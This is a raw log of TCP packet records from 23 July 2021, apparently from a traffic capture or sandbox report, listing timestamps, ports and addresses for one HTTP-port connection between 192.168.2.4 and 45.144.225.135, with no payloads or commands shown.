Jul 23, 2021 22:24:24.687530041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687546015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687555075 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687561989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687572002 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687577963 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687592983 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687608004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687623024 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687632084 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687655926 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687668085 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687680960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687694073 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687700987 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687721014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687740088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687741995 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687760115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687781096 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687788963 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687799931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687827110 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687848091 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687863111 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687869072 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687891960 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687901020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687916040 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687922001 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687938929 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687947035 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687962055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.687973022 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.687984943 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688009977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688013077 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688030958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688050985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688059092 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688071966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688091993 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688113928 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688136101 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688138008 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688144922 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688158989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688180923 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688198090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688209057 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688225031 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688234091 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688240051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688241005 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688258886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688275099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688291073 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688298941 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688306093 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688307047 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688323021 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688338041 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688354015 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688369036 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688385963 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688388109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688404083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688419104 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688435078 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688448906 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688468933 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688486099 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688487053 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688492060 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688494921 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688498020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688502073 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688517094 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688533068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688544989 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688551903 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688553095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688569069 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688584089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688607931 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688620090 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688620090 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688626051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688632965 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688644886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688661098 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688677073 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688692093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688707113 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688719034 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688721895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688736916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688755989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688772917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688787937 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688803911 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688822985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688774109 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688832998 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688837051 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688837051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688839912 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688853025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688867092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688884020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688885927 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688890934 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688903093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688918114 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688932896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688935041 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688940048 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688942909 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.688949108 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688962936 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688977957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.688992977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689012051 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689024925 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689028025 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689043045 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689058065 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689070940 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689073086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689079046 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689088106 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689102888 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689116955 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689117908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689122915 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689126015 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689136982 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689152956 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689167976 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689182997 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689191103 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689198017 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689213037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689228058 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689237118 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689241886 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689244032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689245939 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689261913 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689279079 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689292908 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689306974 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689308882 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689323902 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689340115 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689354897 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689369917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689372063 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689377069 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689379930 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689388037 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689404964 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689419985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689419985 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689424038 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689435005 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689450026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689466000 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689480066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689483881 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689491987 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689495087 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689512968 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689529896 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689544916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689559937 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689574957 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689589024 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689604044 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689620018 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689624071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689631939 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689637899 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689654112 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689670086 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689683914 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689686060 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689692020 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689696074 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689701080 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689717054 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689732075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689742088 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689747095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689764977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689781904 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689783096 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689835072 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689838886 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689843893 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689851046 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689855099 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689857960 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689862013 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689866066 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689882994 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689898014 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689912081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689928055 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689928055 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689943075 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689944029 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689956903 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.689959049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.689974070 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.690907001 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.690928936 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.690934896 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.705270052 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.705302954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.705333948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.705389023 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.705414057 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.705416918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706437111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706459999 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706494093 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706516027 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706557989 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706618071 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706645966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706670046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706706047 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706721067 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706736088 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706759930 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706801891 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706810951 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706832886 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706851959 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706876993 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706909895 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706932068 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706952095 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.706953049 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706976891 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.706991911 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.707007885 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.718020916 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718054056 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718071938 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718091011 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718111038 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718128920 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718152046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718231916 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.718339920 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.718513966 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718538046 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.718728065 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721216917 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721246004 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721266985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721375942 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721438885 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721498013 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721534967 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721523046 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721582890 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721620083 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721638918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721647978 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721652985 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721687078 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721688032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721712112 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721728086 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721733093 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721743107 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721755981 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721769094 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721776962 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721787930 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721800089 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721817970 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721822023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721843958 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721854925 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.721868992 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721892118 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721914053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721935034 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721959114 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721976042 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.721997023 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722018003 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722040892 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722062111 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722083092 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722105026 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722104073 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722127914 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722152948 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722174883 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722196102 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722218990 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722242117 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722263098 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722279072 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722285032 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722307920 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722321033 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722332954 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722345114 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722356081 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722377062 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722383022 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722398043 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722419977 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722420931 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722441912 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722446918 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722464085 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722486019 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722486019 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722511053 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722523928 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722532988 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722554922 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722562075 CEST	49750	80	192.168.2.4	45.144.225.135
Jul 23, 2021 22:24:24.722577095 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722598076 CEST	80	49750	45.144.225.135	192.168.2.4
Jul 23, 2021 22:24:24.722619057 CEST	80	49750	45.144.225.135	192.168.2.4
